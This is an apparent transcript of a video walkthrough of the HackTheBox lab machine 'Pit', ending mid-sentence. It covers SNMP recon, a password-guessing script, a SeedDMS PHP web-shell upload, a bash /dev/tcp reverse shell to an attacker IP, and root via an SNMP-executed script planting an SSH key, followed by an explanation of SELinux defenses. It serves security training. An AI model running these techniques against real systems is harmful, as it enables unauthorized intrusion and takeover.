What's going on YouTube? This is Ipsec. I'm doing Pit from HackTheBox, and I really like this box because of how much value it puts on recon. If you ever get stuck on the box, you go back a few steps, look at the recon you did, and it will probably paint a path forward. Too often when people have trouble, I mention maybe a recon needs improvement, and they're just thinking, no, my recon is good. I know how to run nmap. I know how to run GoBuster, but they don't understand how to look for the subtle things. And with this box, it really shows you that because you run just your basic things. You get access to 2 web servers, can't really do too much. You find some paths in SNMP that leak a directory that you can use on a web server to get access to the SeedDMS application. With that, once you log in, you notice the changelog says it's running a version, and comparing the version against SearchPoint, it shouldn't be vulnerable. But you look at the changelog to find out how they patched it, and they patched it with htaccess. And looking at nmap, it says it's running nginx. So if you still run through the exploit manually, you can pop the server. Once you get a shell on the box, you're looking around and you see, oh, this is running SELinux because all the directories have this little period at the end of the permissions, which is an indicator of SELinux, which does become handy in this box. Additionally, we'll go over SELinux at the very, very end. But you're having trouble privesking, you go back to the SNMP output, notice something weird, that it's executing a program. Look at that program, and you can get execution through SNMP and pop the box. So with all that being said, let's just jump in. As always, we begin with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it pit, and then the IP address of 10.10.10.241. This can take some time to run, so I've already ran it. Looking at the results, we have just 3 ports open, the first one being SSH on port 22, and its banner tells us it's OpenSSH 8.0. Now, this is a little bit weird. Normally, I'm used to seeing some type of like for Ubuntu 0.3 or 2 or something like that, but we just see OpenSSH. It's very similar to like the banner we did on a box a long time ago, like CrossFit 2. If we look at that one, which was a BSD box, we can see this is just saying OpenSSH 8.4, so these banners are very similar. This turns out to be a Red Hat box that we'll find out eventually, but I'm just pointing out the type of recon you can kind of do on things like this. And even like a Debian default banner, if we look at, I think delivery, I did it in Debian. This says Debian 10deb u2. So right now, we just know it's probably not Ubuntu or Debian based upon that banner. And thinking maybe BSD, CentOS, Red Hat. I don't have CentOS box off the top of my knowledge, or off the top of my head to compare the banner with. But yeah, that's what I'm thinking right now. Then we have HTTP on port 80, and it's running nginx 1.14.1. And we don't really see too much else. We have a 9090 open. This looks like it is going to be HTTP as well because we can see these banners. Scrolling down, we don't have anything else. So one thing that we should be doing that I don't show in my videos enough is a UDP port scan. So I'm going to do -S on 10.10.10.241. And we can do -OA nmap pit-UDP. Yeah, that should work. So let's go over to port 80. So 10.10.10.241, and we get welcome to nginx on Red Hat Enterprise. So this tells us we are definitely running on Red Hat. We could take a look at that other port, so port 9090. Let's do 990. It directs us to HTTPS, and we should always look at certificates. When it is, we get a DNS name of dms-pit.htb. So let's make sure we resolve to that. So sudo vi etc host, and then 10.10.10.241 dmi-pit.htb. And that is it. That is also in the nmap script, or nmap scan. So if we do less nmap pit.nmap, look all the way down here, we can see certificate, common name, DMS-pit. So let's take a look at what this page is. And we have pit.htb. This is running CentOS. So it is not Red Hat. Red Hat is like the commercial version of CentOS. CentOS is just an open source fork. So it's always kind of weird when you look at things and things conflict. But nginx, they just didn't change the banner. Here on 9090 is definitely going to be CentOS or CentOS. I don't know which pronunciation is correct, but trying to figure out exactly what this application is. We have window cockpit PO, and I think Red Hat or CentOS has cockpit. So let's do CentOS cockpit. Go to Google. I can see what this is. It is definitely a project. And we could read more into this, but we'll just find out eventually exactly what this is. But this is the type of recon I would be doing on the box to understand. There's an application that's very similar to that. For the life of me, I can't remember. I think it runs on port 10,000. Oh, it's Webmin. Webmin is what Cockpit is very similar to. So we kind of know what's here. We need credentials to log in. We could go for Googling like Cockpit default credentials, but it uses the credentials that are on the system. So it doesn't really have any default. As I say that, I am wrong. So we can try this. Sim generates the default password of admin123bang. So we could always try logging in with admin and admin123bang, but we get wrong username and password. It is telling us the server is pit.htb, so let's also add that into our host file. So go over here, pit.htb, save it. We can see that UDP scan is still running. So these do take a long time to run. That's why I don't show it every video, because it's rarely useful, but when it is useful, it is extremely useful. So always have some type of recon running on the background. You never know when it'll come in handy. So right now we just have welcome to nginx. So I'm going to try each of the names. So pit.htb. We also get that. We also had DMI-pit. Was it DMI? Let's see. DMS. DMS-pit.htb. And this one returns 403 forbidden. So we should start a GoBuster on this. So GoBuster-u HTTP DMS-pit.htb -w for word list opt sec list raft discovery, then web content raft small words .text, and we don't know exactly what this is running. We could go back to just 10.10.10.241 and try index.html, index.php. Ooh. Index.php, oh, it's not found. This is just a fancy 404. If I try like go to please subscribe, we get page is not found. So yeah, fancy 404 page. So we don't know the extension, so I'm not going to run it with an extension. And we'll do gobuster.out. We need to specify dir mode. dir. There we go. So we have /config. It is giving us a 403. Anything with a period first is looking like it is 403. Oddly enough, wp-config is 403. Is everything here. Let's try dm. What was the name? DMS-pit. -pit.htb 404. So if I do wp- config, I didn't do the dash there. 403. So let's do please -subscribe. We get 404. So that is weird that wp-config gives 403. Does wp-content? 404 not found. So there's something weird going on here that I don't know yet. wp-config is a default WordPress directory. Also a default directory, I believe, is wp-content. We can confirm our suspicion by going to WordPress GitHub and finding out what it is. Yeah, wp-content. Oh, wait. wp-config is not a directory. That's a PHP file. I think it's also can be a directory. Sometimes I hate doing some things live, but we have a lot of weird things that we can't understand why they're going to 404s. Going back here, nmap still is running. It is only 43 or 45% done. One of the common things that is running on UDP is SNMP. So let's just try doing an SNMPWalk. V2C, this is the default version of SNMP on most things. -c public. This is the default password for SNMP. It's a community string, not password, but they operate kind of the same way. So we can do 10.10.10.241. And when we crawl it, we get data back. So what I'm going to do is we'll use T to do snmp.output and just let this crawl. It'll probably take 3 to 4 minutes for it to run. So I'm just going to pause the video and we'll come back to it once all this output is done. I probably would be poking at like more Go busting, maybe setting up to do a virtual host bust since we have multiple virtual hosts in play already. But for the sake of the video, we're just going to let SNMP run. So the SNMP scan has finished, and right off the bat, I see some really interesting things here. All this like SELinux stuff, memory usage, it's outputting things I'm not used to seeing in SNMP. Like this is the full output of a command, it looks like. Like it doesn't have this SNMP MIB, is that what I think that is called? But all those numbers before it is just weird. If we scroll up enough, we can see user bin monitor, and that's not a default program. So this is definitely odd. I'm going to just look at the output, and we could just less it like this, but well, here's a good example. If we go to the bottom, I really just hate viewing things that are like with line wrapping, I guess I should say. So how I'm going to view this is with less-S, and then we can just view it so everything is on one line and kind of get to what is interesting to us. Looks like we have audit D running with some things. We have PHP right here, so we know the server is PHP. I should probably go back and change my GoBuster to have the PHP extension just by seeing that. And we keep going down. We have more text over here, just kind of glancing at the text that SNMP gives us. I don't know exactly what this is from. It kind of looks like sendmail or something with a bunch of arguments. But just going down, viewing all the SNMP information, this is where it gets weird. So we can also just grep things out of SNMP. So if we grep like HTML out of SNMP, that's a good one to do. We can see it gives us var www HTML SeedDMS51x/SeedDMS. So I'm thinking right now this is a virtual host. So I'm going to try just going into the SeedDMS folder. And we can go here and say SeedDMS. We get 404 not found. And I'm also going to try putting this as the folder. So if I put this, we get A403 forbidden. And actually added a slash for me. Did it add a slash for me when I did wp-config? It does not. So that's another small thing you can do when enumerating, is notice those super subtle things. So if I do curl-i-v, what is it, dms-pit.htb, this should be 403 forbidden. So we do wp-config, we get 403 forbidden. If I do, shoot, what was it? Let's go back here. SeedDMS51x. It's probably going to send me a 301 redirect. Yep, there we go. We get a 301 redirect, and that directs us to the directory with a slash before giving us the 404, not 404, the 403 access denied. So this is good knowledge to know, and just small bits of recon that I think a lot of people just undervalue is just noticing those small subtleties. Like we went down this path, it's super obvious now that I'm doing it in the command line looking at headers, but just being able to notice it like this, and oh, wait, I didn't put that slash there. The computer did that for me. That's something that just kind of takes experience and something you should always be looking at. How do applications behave differently when I do certain things? So let's try going into the SeedDMS directory in here, and we can see we get a whole application. So knowing this exists, the very first thing I would do is probably Google to see if this is open source. So we can just Google like GitHub SeedDMS. We can see there is a GitHub project of it. We got index.php, requirements, it's a web-based. Should probably read all this to understand the application. But right now, I just want to identify if this is actually the correct thing. So I wonder if there's a readme Ubuntu on this box. SeedDMS, if we do readme.ubuntu, 404 not found. And here, not found. Let's try it in this directory. So maybe this isn't the right application, or the readme is just not there. See, is there anything that makes sense here? We got out, and oh, whoops, this tab. We are in out, and then out.login.php. That looks pretty unique, and this is kind of how they are doing things. So this definitely looks like the application. We can look at the issues, and it says readme.hdb on readme.ubuntu. I don't understand that, but whenever you enter some type of issue, it helps to say what the issue is other than just I have problems. We don't have anything closed, no polls. So this is definitely weird. See if there's anything else. Does this application have a website? So we just Google SeedDMS. Maybe GitHub's not the place. We do have a website. So let's see if there's anything interesting here. Website is PHP. Features, demos, support. We got a changelog. And we have version information. So based upon seeing SeedDMS51, I'm going to guess that is version 5.1. So we're on 5.1x. Looks like it goes up to 6.0. We can download this and see if there's anything that would say the various versions. It is hosted on SourceForge, not GitHub. Let's see, where do I download it? 5.1 Git will be updated regularly. Let's see, let's just go to SourceForge and see if there's a release. It looks like there is. So 5.1.2.1. This is the closest thing we have. And this could tell us some files. So let's get out of that. Move, downloads, SeedDMS, tar zxvf on that file. 5.1x, that is looking good. Do find.grep-i change. And let's see, we have a changelog right here, but it's going into this folder, which I don't think that would exist. I wonder if we can specify like versions here. Let's see. Let's see if dub exist or conf exist. If those exist, then I am going to play with that to enumerate the version. So dub. Let's see. I'm actually going to use curl. So dub. What does this do? Moved permanently to /. If I do dub, we get 404 not found. So we do have potentially a way to enumerate versions as long as that directory exists. So what was it? SeedDMS-5. So SeedDMS-5.1. And we can say 2.1. 404 not found. 2.2. So at this point, I'm probably going to switch to wfuzz-u. And we'll say this is fuzz. And the reason why I'm using wfuzz is because it has this range option. I don't think fuff does. But this should let me fuzz 5.1 and all numbers. Let's see. Out of range. -u, HTTP, like that. Let's see. Oh, it's 1-22. I always screw that up. I think like min comma max, but it's range comma min 2 max. There we go. And let's see, we get 404 for everything. Yeah, we do. So I'm guessing we can't enumerate the version this way. But that is definitely something I would be playing with when doing this box. So let's see. That is doing it correctly. Let me just get rid of those single quotes, but I can't imagine that doing anything. Everything is forward. Okay, so that looks like a rabbit hole. The next thing I'd probably do is try looking for default credentials. So we do SeedDMS default credentials, and I'd also, run like search exploit. So here we go, admin. Doesn't work. We can do search exploit SeedDMS, and we can see cross-site scripting for up to 1.18, but we don't really have a way to perform cross-site scripting because we don't have anything we can send. We could just look at it, and by send I mean like we don't have a comment field, something for someone to interact with. Let's see, reference source. Let's see just how it is for sanity. Published. Where is it? Discovered. It's in post, add event. So unauthenticated users probably can't add event, so I'm just going to ignore that. We can look at like the remote command execution and see what this is. It doesn't say unauthenticated, so I'm guessing, yeah, we can't really do that much with it. We're uploading, so we're logging in, add document, and upload a backdoor. And this is for versions less than 5.1.11. But we need a way to authenticate. So what I generally do is build a brute force script for this real quick. So let's do cd ... let's v login.py. We're going to definitely need to import requests. And I have not done this before, so hopefully it works. If I was doing this as a like actual thing, I'd probably install SeedDMS locally so I know I have credentials that work. But I'm going to treat this like I don't have access to the source code and I have to do it blindly. So I'm sending a post. I don't have a cross-site request forgery token, so that is a positive. And it's sending me back to login.php. So what I'm going to do is automate logging in Python, checking the location, and if it doesn't direct me to login.php, I report something. So let's do this. We can say request.post http, what is it? dms-pit.htb/ all of this. Okay. And we also need to set the data. So data is equal to login username. And then the password is going to be pwd password. And then we just set lang to nothing. Like that. I'm going to create this a function, so we'll call this def login, username, password. Okay. Let's see. Here we can say data is equal to data. And we want to print the header. So I'm just going to import pdb.setTrace. I think it's setTrace. Python 3 login.py. Actually, can't do that yet. We can say login test. Python 3 login.py. Okay, so we have now debugged the application, which means we can do r.text. Wait, is that what I called it? R is equal to request.post. Oh, I think I know what it did. R is probably a actual like command in PDB. So if I do dir, we want headers, so we can print r.headers. Let's see. Don't see location. So we get the server header. So this is definitely the response. So we go server date content type, server date content type, connection closed, powered by location. This is different. The chunked, keep alive, powered by, and that's not right. Print r dot status code 200. So we're probably redirecting. Following redirects. So by default, the request module will follow a redirect. If we change it to allow redirects equals false, we should be able to print r.headers. And this looks better. We have this location. So let's see. How do we get a header? Let's go here. Google request Python get header. Have to specify Google. Using headers with this .get s.headers.get or update. I wonder if there's a .get. Print r.headers.get. Oh, this is actually a dict. We can probably just do location. I should have read the object type better before going to Google, but yeah, it being in these weird brackets, yeah, that's what it told me. So we can say if login.php is in location, or we can say incorrect. We can look for this string, this entire string actually. Okay. So if r.headers location is equal to this string, return false, return true. You can say if login print success. So when we run this, we don't print success. I can say if not login, and yep, it's good. So we have logic checking if we have a valid login. The next thing I want to do is just import sys, and we'll do argv. So here, print sys.argv. I think one will get username. So python3 login.py ipsec yes. Yep, we only want that. So here what I would generally do is come up with a handful of passwords and try logging in with them. So let's say passwords is equal to sys.argv1. So that's testing the same username as password. Then we can say summer 2021 bang, winter 2021 bang, password 1 bang. We can create a quick password list this way. And we can say for password in passwords, and then do this login. There's probably like a fancy Lambda function I can do to do this all in one line, but I'm lazy and like simple code, so that's how I'm doing it. So we can say password and sys.argv1. Probably should say like user is equal to sys.argv1 to clean up the code and make it easier to read what we're doing. User, and if I python3 login for root, it's going to try a few logins. We don't get any successes, so we can just keep going down the train. Now, there is normally usernames in the SNMP output, so let's check that. So snmp.output and see if there's any usernames. Linux pit, root. These are all integers. So I'm going to remove anything with integer because that is not needed. And I'm going to use vim actually. So we can say vim. So I can just do probably /integer/d %/integer integer d. That deleted everything. Let's try :g integer/d. That's looking better. So we removed 600 lines. Okay, so we can just keep going through to see if we see like usernames. We could try like /user/i. Oh wait, we may have something here. SELinux systems user. These are groups, like we have root, staff, user u, x guest. Right here we have a username, Michelle. So we can try Michelle. I'm not going to save that. I can just grep-i SNMP output. Yeah, Michelle, like this. Nope, we do Michelle at the start. And she only exists in that one location. The reason why I did this is to kind of be thorough. So just because I found one username doesn't mean users aren't in the SNMP output in other places. So I was just kind of checking like if she exists in another place that other users may be there, but doesn't look like this case. So let's do the Python again with Michelle. And we get a success, but my bad coding doesn't tell me the password. Typical me. So let's print password. So her password is one of these. Log in. And her password is Michelle. So we can try logging in with Michelle and see what this gets us. We have now logged in. So we have an upgrade note right here. So if we look at this, we have, dear colleagues, based upon a security issue in the previously installed version 5.1.10, I upgraded SeedDMS to version 5.1.15. See attached changelog for information. So we already kind of have this changelog, but might as well just use the one they've attached because we downloaded the whole application. That's why we have it. CP downloads, changelog. I think this is it. Yep, this is SeedDMS. The other thing to keep a note is if we do search exploit for SeedDMS, it's only going up to 5.1.11, and our changelog specifies it is 5.1.15. So we're in a higher version. If we look at the changes to 5.1.11, let's see, we have remote command execution through unvalidated file upload, add .htaccess file to the data directory. And this is interesting. And why I called at the beginning of this video like OSCP like, because in my mind, the OSCP exam when I took it was all about doing good recon. And if you go back to the recon here, there's one key piece of information that a lot of people kind of just skip over. This is an nginx server. Nginx doesn't do htaccess. Wonder if we can find a post real quick that's interesting. nginx.htaccess. Let's see. Does this pull it up? Examples. How can I use? No. Wait a second. It's the first result. I'm used to this being an ad, so my eyes just ignore it. But yeah, I just found this page funny. Like Apache htaccess, you can't do this. You shouldn't. And if you need htaccess, you're probably doing it wrong, which is kind of a clue that this patch doing it wrong by just using htaccess to try to prevent a exploit. So we can try to test this still. So let's just run through the exploit even though it says it's patched. So search exploit, SeedDMS. So let's go through here. Search exploit -x. So we have to log in and then add a document. So this is what we have to do. So let's go back to DMS and find out how we can add a document. Well, there's a docs directory, so let's go here. Don't see anything different. I'm looking for like an upload or create or this action button not to be blocked out. So I'm going to go to users. We have two. We have Jack and Michelle. Michelle actually has action she can do. I'm not going to delete it. I think that X is delete. So once we go into this, we can add document. So let's add something. We call it please subscribe. And then if we scroll down, we can add a local file. So I'm going to create a quick shell. And this backdoor is actually probably something you should be using. The main reason why I say that is normally in my videos, how I do backdoors, I just do like PHP, CMD, request CMD, like this. But if you don't set this parameter, then the web server is going to error out. We can just do this real quick. PHP-S 127.0.0.1. I think that's all I need. Let's do port 8000. So if I curl localhost 8000 test.php, we can see it is not found. Wait, I wrote shell.php and, well, wrong file name. The PHP web server is actually not giving me errors out here. But in a lot of web servers, if error messages are displayed, this would go to the user. And this undefined index CMD would tell them the command that they need to abuse your web shell. So what the search exploit is doing is checking if this parameter exists first and then running the command. And why this is good is because if you wanted to like be secure and not let other people use your web shells, you would do this and then change CMD to be something that someone would never guess. As long as they don't think it's me exploiting the box, I doubt they would guess please subscribe as a parameter, but yeah. So that's what we do. This echo pre, all this is doing is like making the HTML look pretty. If you don't have this, then everything's probably going to be on one line because by default, HTML line breaks by like BR like that. That pre-tag will make line break also work with just a normal line break. So decent web shell, would recommend using that other than just a one-liner you type up haphazardly. So let's go to browse. We can do HTTP, pit, and then the file shell.php, and we can add the document. So we can see please subscribe exist. If we go back to the web shell, the search exploit, we can see how to use it. And this is a little bit unintuitive. They have a directory. They say go to example.com/data 1048576, and that's actually a default directory. So you just want this to exist. Well, you don't want to exist. You just don't have to overthink this. If I was just looking at this payload, I would think this is some weird like date that documents get uploaded or some type of ID, but the document ID comes on after and then 1.php. So all we need to know is the document ID. If I go to download this, in the bottom left-hand corner, I can see document ID equals 30. So I think we have everything we need to make this payload work. Only thing is, we have to know where this data directory is. So I'm just going to go to out/data, see if this exists, 404 not found, remove out, SeedDMS, 404 not found. Let's go up one more directory, and we get 403 forbidden. So chances are that directory exists. Let's try this 1048576, 403 forbidden. And the key thing also is it is adding that slash for us. So we got a redirect because it existed, and then we went to forbidden. Then the last thing is document ID. We said that was 30. So let's do 31.php. We get nothing. If I say please subscribe is equal to ID, boom, command. So let's try getting a reverse shell. Sending it over to burp suite. Let's intercept on, send, go to repeater. Let's change the request method so we put everything in the post. --c, --i, dev tcp 10.10.14.8 9001 0 and 1, like that. And then Control U to URL encode it, and see LVMP 9001. Click send, and it comes back right away. We don't have a shell. So something is weird. Maybe we mistyped this command, or maybe like something exists on this box. Based upon the SNMP output, it did end with like SELinux stuff. So if I cat SNMP out, we should see these are SELinux things, so probably right above it, we do have SELinux. However, it blocking reverse shells probably isn't the first jump I would do. I would be thinking like IP tables. So I do LSLA on etc. Because generally IP tables saves in a directory like etc IP tables or something. And whoops, one thing I really notice is there's a period after every permission. And this is also indication of SELinux. So if I just do like LSLA, we don't have that period. We do it here. So again, a small little recon tip, noticing that period's like, oh, maybe it's SELinux. We can search for like IP tables. We don't really have anything. So my next step is, well, we're www data, or not www data, nginx. I can cat etc passwd and I look for nginx because I want to try to get like shell access to this server. It's sbin no login, so if I dropped an SSH key, does me no good because I can't log in. So my next bet is to look for password reuse type thing. And the best way to get a password is to look in the web service config to see how it accesses the database. I'm doing pwd, so I can see my path is here. I probably want to go into the SeedDMS51x directory, so I go up 3 directories. So if I do ls .. we can see a config. So let's go there. And we have settings.xml. So let's do settings.xml, do cat, and here we go. We have SeedDMS. So I can look for password. We have 19 matches, lots in comments. Database, 9 comments, or 9 matches. Let's try typing my database names like MySQL, 1 match. So this is probably where I'm going to start. Database name is localhost, DB database, user, and DB password. So we can check this password. So I'm going to do cat etc passwd. Let's make sure I saved that password. Ooh, is that the wrong? Did I copy it? Let's do Control Shift insert. There's 2 clipboards on Linux. I always choose the wrong one for some reason, but we just have the PW there. So what was I going to do? We are looking at a web shell and brute. I'm going to cat etc passwd again. And I'm just looking for users. So we have RNG, cockpit. I probably just want to grab all this, honestly, and grep for sh. So vtemp, grep sh, $ on temp, so it ends with sh. Pretty much only 2 users, root and Michelle. So I'm going to try ssh Michelle at 10.10.10.241. And we get permission denied. It only accepts public key. So let's try the other service we have access to, which is cockpit. So 10.10.10.241, port 9090. And let's access this. CentOS Linux, Michelle, password. Oh, that's not it. Let's cat pw. This is why it's always handy to save the password. If I was doing this like not recording, I would probably use Obsidian or something to take notes as I go, but that adds like 20 minutes to each video of taking proper notes. So you can just search ipsec.rocks for Obsidian and probably find a few videos of me using it. So we're in this web application. We can do SELinux and try turning it off. Oh, error, can't. So let's go over to terminal. And this is weird. ls. Well, it looks like it's working, but we get a bunch of junk. I'm going to click reset. Nothing happens. Let's change the appearance. It wants HTML5 canvas image data. Let's allow this. And then when we change, everything works. So it just was a weird browser thing blocking access. So let's do lsla, and we have a shell on this box. While I'm here, I'm going to go cd.ssh. I'm going to see if we added an SSH key, if it will work. The main reason I'm doing that is because something's blocking our reverse shells, so I want a reliable way I can get onto the server. SSH keys are pretty reliable. So let's do SSH keygen -f. I'll call this pit. Put no passphrase on it. chmod 600 pit. And then let's cat pit.pub. And we'll copy this into our SSH directory. So echo this to authorized keys. Okay. SSH-i pit Michelle at 10.10.10.241. And that does not work. I expected it to. Let's do chmod 600 authorized keys. Let's see. -v. Unspecified GSS failure. Well, that's probably always there. Cat authorized keys. It is there. Michelle owns it. AUTHORIZED_keys. This is weird. I'm probably doing something really ridiculous. LSA on pit. Cat pit, that is the private key. MICHELLE. MICHELLE. Huh. So what I'm going to try doing is let's copy pit.pub to SSH authorized keys. We can say sh-i pit ipsec at localhost and see if it lets me log in here. It does. If I remove that authorized keys, it doesn't. So my authorized key file is correct. Let's MD5 sum it real quick. Pit.pub 39733 MD5 sum authorized keys. Same exact file. So maybe this user just doesn't have SSH access, which is weird. Cat etsy ssh shd_config. Can't access it. Let's see, lsla on etsy sh shd config. And we can say .rpm new. So this is slightly different than what is there. So maybe this user just doesn't have SSH access, or I've screwed something up hilariously that I'm going to hate myself when I read comments. But we can do everything here from this prompt. The key piece of information now is thinking back to snmp.out. And if we look at this, let's go G. Right where I said it's weird, we have this user bin monitor. And what's happening here is it's executing this script and putting a bunch of information down below. I wonder if this is a known mib, if this is like execute mib. Let's just Google this and we'll probably come up with some spoilers of the machine, but hopefully we come up with legitimate documentation. Okay, we can just ignore that. So I don't know what this mib is name's called. I don't know SNMP well enough to figure out how to trace this. I just know I see binary and then see random data. I'm going to go over here and look at that binary. So let's do cd user bin and file monitor. It is a bash script, so we can less monitor and see what it does. And it says for script and user local monitoring check *sh do bin bash script. So let's try writing something in there. We can say echo, wait, what is it? User local monitoring. Copy. Echo, let's do echo please subscribe to user local bin monitoring check 1.sh. I think it's check star.sh. So we just have to write something. And then I can run this SNMPWalk again. So do I have it here? SNMP walk -v2c-c public 10.10.10.241, and we'll just let that run. And the one thing about this that I did not mention is a lot of people may just ignore this and like run into a brick wall, because if I do LSLA on that directory, we get permission denied. If I do LSLA user local grep for monitoring, spelled it wrong, we can see we don't have access. Root, and then no one, but we have a plus, and plus means there's extended permissions. So we can say, I think, get fackle, user local monitoring, and we can see Michelle actually has write execute. So the extended permission of this is just so you can grant individual users, because originally it's like earner, group, everyone else, and it doesn't have a bit to set it specific per users, so the extended attributes let you do that. So we can see Michelle can write execute, but she can't actually read from it, but she can write in it. And it's funny because if I do two like direction signs, I'm probably gonna get a failed, because by default this looks for the file and then appends to it. Because it can't look for the file, or it can't read the file, it can't append, so we get permission denied. This SNMPWalk is still running, so I'm just going to wait for it to finish. So we'll pause the video and see exactly what happens. Okay, so the SNMPWalk is done, and we go up to the top, and we can see it just says, please subscribe. It doesn't have the echo here, so I know it actually executed the code. If it said echo, please subscribe, I'd be like, oh, it just outputs the contents of the file. But because it doesn't have echo, I know it executed something. And the reason why I chose echo and not like ID or something is because I have a lot of like just information about things running, and ID, I may have been like, oh, was that there before? Is that mine? So that's why I chose echo and did a unique string. And I didn't go for like a reverse shell or something like that off the bat, because when you're enumerating exploits, you want to keep it simple. And yeah, because if you start complex, like making it complex and it fails, you don't know if it failed because of 100 reasons, because it was complex, or just something simple like the exploit didn't work. So now that we know that works, we can go back here and let's try sending our SSH key there. So I'm going to try this SSH key thing again. So echo, and we need to, let's see. Where is my SSH key? ls cat pit.pub. So we can copy this. So echo that to /root/.sh/authorized keys. I wonder if Michelle I said key, and this is keys. That'll be hilarious. Just directed to check 1.sh. That should be fine. Run this SNMPWalk again, and we gotta wait for it to finish. So let's see. ls.ssh. No, I have keys. It's gonna be funny. Maybe SELinux blocks our login, or let's see, is there like ls etc ssh. It's like a login.allow or something, I remember. I'm not sure. But we'll just wait for this thing to finish. SNMPWalk to finish. Now that the SNMPWalk is finished, we can try it again. And we get in. So from here, we can just read root.txt, and that will pretty much be the box, but not the end of the video. There are a few things I wanted to mention. The first one being, if that SNMP thing doesn't work, try it again. The one thing I probably would change about this is every 5 minutes it creates this cleanup script. And if you look at the cleanup script, it's just going to be removing all the scripts and user local monitoring. What I would have probably changed about this box is just make sure it only deletes files after they exist for 5 minutes, because it takes me like 3 minutes to run the SNMPWalk. So around half the time, you're probably going to lose that race condition just on a coincidence of you create that file to get executed, the cron goes and cleans up the directory, and by the time the SNMPWalk gets to your script, it just doesn't work. So be in mind of that when you're doing this box. But the last thing I wanted to talk about is SELinux, because it's probably one of the most important security features to Linux. But the first step of installing Linux for most people is just disabling it altogether, because it can break things and people get scared when things break. So what is SELinux? Well, it's a mandatory access control system, but what's that mean exactly? Remember earlier in the box where we talked about the extended file permissions that allowed Michelle to specifically write to that directory and no one else? Now imagine that for every action on the server. We're not just talking about writes, we're talking about binding to a socket, connecting to a network port, reading a specific file. And it's not even every action, like all those actions for users, it's also a label of like the application that's running for that user. So there's a lot of things. So if like SNMP is running as root, but it's got the SNMP label, it still doesn't allow you to do everything that root can do. As you can imagine, that breaks a ton of crap. Thankfully, we don't really manually configure SELinux nowadays. You just use like set enforce to turn it into permissive mode. So set enforce 0, I guess, to turn it into permissive, or 1 to turn it into enforcing. When it's in permissive, all it does is say like, this would have been blocked, but it's in permissive mode, so we allowed it. And even if you don't plan on ever enabling SELinux, that's still a super handy thing to have, so you don't want to disable it. Because if someone does a web shell, like if they hack your server, they send a web shell, if you have SELinux in permissive mode, there's a high chance that a log is going to be generated that says, hey, this web server connected to the network, but you're in permissive mode, so we just let it be. The main way to just allow things is just running like audit to allow, and it's going to look over your SELinux log. You look over each thing, be like, yep, I accept that. I'm going to cat it to the output. But this doesn't really make for good learning opportunities. And man, it can take a while. So while that runs, let's get another SSH session to this box. So sh-i pit 10.10.10 241. Because I want to, I have to specify root, to like explain what these rules are and like demonstrate SELinux. And just doing like the autopwn button to just make SELinux works isn't that great for a demo. So let's go up here and we can say, actually, go to a reverse shell. So let's do this, which I believe will be blocked. I think we have to do document 33 now. Does that exist? It does. Okay, so I'm going to set it to port 9001, and I'm going to NC LVMP on my local host on 9001. We're going to run this, and we don't get a reverse shell. Nothing happens here. So what I want to do is look at that audit.log file. So let's grep denied on verlog audit.log. And near the bottom, this message keeps getting generated. It's a dbus1. We're going to always ignore this. But we see this one, ABC, that's access vector cache, I want to say, but it's a name connect. So let's grep name connect tail-1. So this is that log line for this event. It's telling us the PID. If we look at that, this is probably going to be Apache. Let's see, ps-ef grep this. Nope, that's the process that either the Apache thread or what bash would have been. But bash is trying to connect to 9001, and we get a bunch of SELinux gibberish, TCP socket, and permissive equals 0, so permissive's not on, so it blocked it. If we had permissive on, this would be permissive 1, and it would not have blocked. But that's not really human readable. So if we do audit to Y, which is a SELinux program, it will convert this log into something we can read. So ABC denied, name connect, what was caused. HTTPD can connect, network was set incorrectly. We have to enable this to have HTTP be able to connect to the network. And you may be thinking, this is a web server, it always connects to the network. Well, no, it binds a socket to the network and things connect to it and it talks back. You rarely have HTTP reaching out. There are cases where you'd have HTTP reaching out to like a database, and you can also do like set that as well. So set se bool, and then we're going to do -P for the policy. HTTPD can network connect, and there's a specific one for various things. There is DB. If we want to look at them, that's going to error out because I didn't say 1, but we can do get se bool -A, and we can see all these things. If I look at HTTP, let's see, that's not that, MySQL. We have bunches of things that HTTP can do. So we can say like it can connect to FTP, it can connect to LDAP, Myth TV, that's a funny one. That's like the precursor to XBMC, or maybe that's after XBMC, Xbox Media Center. And then that kind of turned into Plex, I guess. But we got Zabbix, which is kind of like Nagios, just can connect in general, can connect to DBs. So you have a lot of these things. So if I just enabled can connect to DB, so that is now enabled. Man, that audit to allow is still running. We go. Doesn't work. But if I do NCLVNP3306 and specify we want to go on port 3306, boom, reverse shell, because we allowed HTTP to connect out to databases, which is on port 3306. So if you want to do like a good defense in depth, this is amazing addition to a host-based firewall. To prove that this wasn't IP tables, I guess I can just do NC3306, and we can set this bool to 0 to turn it off. And now when I click send, we no longer get that reverse shell. So that's pretty awesome. The other thing, it will prevent binding to sockets. And it can do this mainly because of specific rules that allow HTTP to only bind to HTTP sockets. So if I do NCLVNP 9001, we send this, and we're going to do pretty much the same thing. So where's this grep? We're going to grep denied. We're not going to look at name connect because we don't know exactly what the error message is. It is name bind. So if I do my same thing with audit to Y, instead of name connect, we do bind. Run audit to Y, and it's just telling us it's missing the type enforcement rule. If we look at this, it is using the context, or the target context. It's trying to access Tor port. And by default, HTTP only has access to HTTP port. If we pipe this over to audit to allow, we can see the entry. It would write to the config to allow us to do that. Allow HTTPD access to the Tor port, TCP socket name bind. So if someone tried to use the Tor port with UDP, it would fail because we're only allowing TCP. It's like the principle of least privilege, and if there's no like allow statement, the default thing is deny it in SELinux. So we can use like se manage port -l, and this is going to list what each port is. Like if I look at 443, we can see that's, well, PKI. Let's go up. Here's all the HTTP ports. So if I tried binding, maybe if I bind on 9000, it will actually work. Let's try that. Let's do like 9000 or 8443. Ooh, it would work because that is a default port for Linux. So NC 1010 10241 9000 10 no route to host. Netcat. Do I specify -p? But that's a source port, right? Ping 10.10.10.241. Okay. Port 80. So I can't bind to port 80 because I'm not using sudo. Okay, I can do a GET request. 9000. No route to host. That's weird. I'm going to try 8443. I was expecting it to say, like, just couldn't connect. 8443. Wonder if there's something in SELinux blocking it, but I don't think so. NC-LVNP. Nope, that's right. I don't know why it's taking so long. So maybe something else is at play here. So let's do this, and I guess the curse of the demo gods, I was not preparing to go into this. We don't see anything blocking us on 8443. We still have the last denied as this 9001 source. IP tables -L. Nothing there. I'm actually baffled to what is happening here. Let's see. Let's curl LVMP 8443. When I do this, it's now taking a long time. Let's do 9000. ID. Okay, my command shell still works. Let's see. Is it -ZV? Done. I don't know what's going on. But we'll move on. We could have added a port to that. If we look at the Tor ports of this, grep Tor, we can see 9001 is one. So I guess the last thing I want to talk about is blocking access to files. So in the video, I mentioned if you tried going to user local monitor and we attempted 